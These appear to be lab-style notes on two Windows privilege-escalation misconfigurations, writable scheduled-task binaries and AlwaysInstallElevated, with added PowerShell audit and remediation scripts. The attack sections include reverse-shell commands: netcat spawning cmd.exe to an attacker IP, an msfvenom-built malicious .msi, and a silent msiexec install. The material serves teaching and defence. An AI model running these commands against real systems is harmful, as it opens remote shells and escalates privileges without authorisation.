Quick misconfiguration wins
Attack tree
1 Escalate through misconfigurations
1.1 Scheduled tasks (OR)
1.2 AlwaysInstallElevated
Examples
Scheduled tasks
List scheduled tasks:
C:\> schtasks /query /tn vulntask /fo list /v
Folder: \
HostName: THM-PC1
TaskName: \vulntask
Task To Run: C:\tasks\schtask.bat
Run As User: taskusr1
...
The Task To Run field is of interest. If the current user can modify or overwrite the executable, we can control what gets executed by the taskusr1 user, giving a simple privilege escalation.
Check the file permissions on the executable:
C:\> icacls c:\tasks\schtask.bat
c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(F)
In this case, the BUILTIN\Users group has full access (F) over the task's binary. This means we can modify the .bat file and insert any payload.
Change the .bat file to spawn a reverse shell:
C:\> echo c:\tools\nc64.exe -e cmd.exe <IP address attack machine> 4444 > C:\tasks\schtask.bat
And start a listener on the attack machine:
nc -lvp 4444
The next time the scheduled task runs, you should receive the reverse shell with taskusr1 privileges. Depending on when the task is scheduled to run, this may take a long time.
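From the defender's side, the same condition (a task whose "Task To Run" binary is writable by a low-privilege group, or is missing altogether) can be audited across every task on a host instead of checking one icacls output at a time. The script below is an added example, not part of these notes; it assumes Windows PowerShell 5.1 or later with the built-in ScheduledTasks module, and should be run elevated so that tasks registered by other accounts are visible. The list of low-privilege principals and the set of rights treated as "writable" are assumptions you may want to widen.

```powershell
# Added audit example (not part of the original notes). Assumes Windows PowerShell 5.1+
# with the built-in ScheduledTasks module; run elevated to see every task on the host.
# Reports task binaries that are missing or writable by low-privilege principals.

$lowPrivPrincipals = @(          # assumption: principals any local user is a member of
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these rights lets the principal change or replace the file contents.
$writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl

function Resolve-TaskBinary {
    param([string]$Execute)
    # Strip surrounding quotes and expand %SystemRoot%-style variables
    $candidate = [Environment]::ExpandEnvironmentVariables($Execute.Trim().Trim('"'))
    if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    # A bare name such as cmd.exe is resolved through PATH when the task runs
    $cmd = Get-Command -Name $candidate -CommandType Application -ErrorAction SilentlyContinue |
           Select-Object -First 1
    if ($cmd) { return $cmd.Path }
    return $null
}

function New-Finding($Task, $Binary, $Finding) {
    [pscustomobject]@{
        Task      = $Task.TaskPath + $Task.TaskName   # TaskPath already ends with a backslash
        RunAsUser = $Task.Principal.UserId            # the "Run As User" column of schtasks /v
        Binary    = $Binary
        Finding   = $Finding
    }
}

function Get-WritableTaskBinary {
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            # Only Exec actions carry a program path; COM-handler actions have no Execute property
            if (-not $action.Execute) { continue }
            $path = Resolve-TaskBinary -Execute $action.Execute
            if (-not $path) {
                # The "lost its binary" case: the task still fires but nothing exists at the path
                New-Finding $task $action.Execute 'binary not found'
                continue
            }
            $acl = Get-Acl -LiteralPath $path -ErrorAction SilentlyContinue
            if (-not $acl) { continue }                # no permission to read the ACL; skip
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                if ($lowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
                if (($ace.FileSystemRights -band $writeMask) -eq 0) { continue }
                $finding = "writable by $($ace.IdentityReference.Value) ($($ace.FileSystemRights))"
                # (I) in icacls output: the ACE came from the parent folder, so fix it there
                if ($ace.IsInherited) { $finding += ', inherited from parent folder' }
                New-Finding $task $path $finding
            }
        }
    }
}

Get-WritableTaskBinary | Format-Table -AutoSize -Wrap
```

In the page's example the Users ACE carries the (I) flag, so it was inherited from C:\tasks; removing it from the file alone is not enough if the folder still grants write access and a new file is dropped in. Either tighten the folder ACL, or break inheritance on the binary and grant only what is needed, for example `icacls C:\tasks\schtask.bat /inheritance:r /grant:r "NT AUTHORITY\SYSTEM:F" "BUILTIN\Administrators:F" "BUILTIN\Users:RX"`. Tasks reported as "binary not found" should be deleted or repointed at an existing, admin-owned file.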
AlwaysInstallElevated
Query the registry values:
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated must be set in both hives for this to work.
Generate an evil .msi file using msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP address attack machine> LPORT=<port-number> -f msi -o evil.msi
Run the Metasploit Handler module configured accordingly.
Transfer the file to C:\Windows\Temp on the target machine. Run the installer with the command below and receive the reverse shell:
C:\> msiexec /quiet /qn /i C:\Windows\Temp\evil.msi
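The two reg query commands above only show whether the values exist; the condition that matters is that AlwaysInstallElevated is a DWORD of 1 under both the HKLM and the HKCU key, since the policy is ignored unless both agree. The script below is an added example, not part of these notes: it checks both hives, warns when the host is in the exploitable state, and with `-Remediate` sets both values back to 0. It assumes Windows PowerShell 5.1 or later and an elevated session for the remediation step.

```powershell
# Added audit example (not part of the original notes). Assumes Windows PowerShell 5.1+;
# -Remediate needs an elevated session because it writes under HKLM.
[CmdletBinding()]
param([switch]$Remediate)

# The same two keys the notes query with reg.exe
$keys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevated {
    foreach ($key in $keys) {
        # Missing key or missing value both come back as $null (policy not configured)
        $value = (Get-ItemProperty -Path $key -Name AlwaysInstallElevated `
                  -ErrorAction SilentlyContinue).AlwaysInstallElevated
        [pscustomobject]@{ Key = $key; AlwaysInstallElevated = $value }
    }
}

$state = Get-AlwaysInstallElevated
$state | Format-Table -AutoSize

# Windows Installer honours the policy only when BOTH the machine and the user value are 1
$enabledCount = @($state | Where-Object { $_.AlwaysInstallElevated -eq 1 }).Count
if ($enabledCount -eq 2) {
    Write-Warning 'AlwaysInstallElevated is enabled in both hives: any .msi this user installs runs as SYSTEM.'
    if ($Remediate) {
        foreach ($key in $keys) {
            Set-ItemProperty -Path $key -Name AlwaysInstallElevated -Value 0 -Type DWord
        }
        Write-Host 'Both values set to 0. Disable the "Always install with elevated privileges" policy in GPO as well, or the next policy refresh will restore them.'
    }
} else {
    Write-Host "AlwaysInstallElevated is not enabled in both hives ($enabledCount of 2 set to 1)."
}
```

Because the HKCU half is per user, run the check in the context of the accounts you care about (or inspect the corresponding user hives) rather than only as the administrator doing the audit.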
Notes
These belong more to the realm of CTF events than to real-world scenarios.
Looking into scheduled tasks on the target system, you may see a task that has either lost its binary or uses a binary you can modify.
Windows Installer files (.msi files) are used to install applications on the system. They usually run with the privilege level of the user that starts them, but they can be configured to run with higher privileges from any user account (even unprivileged ones). This could allow a malicious .msi file to run with admin privileges.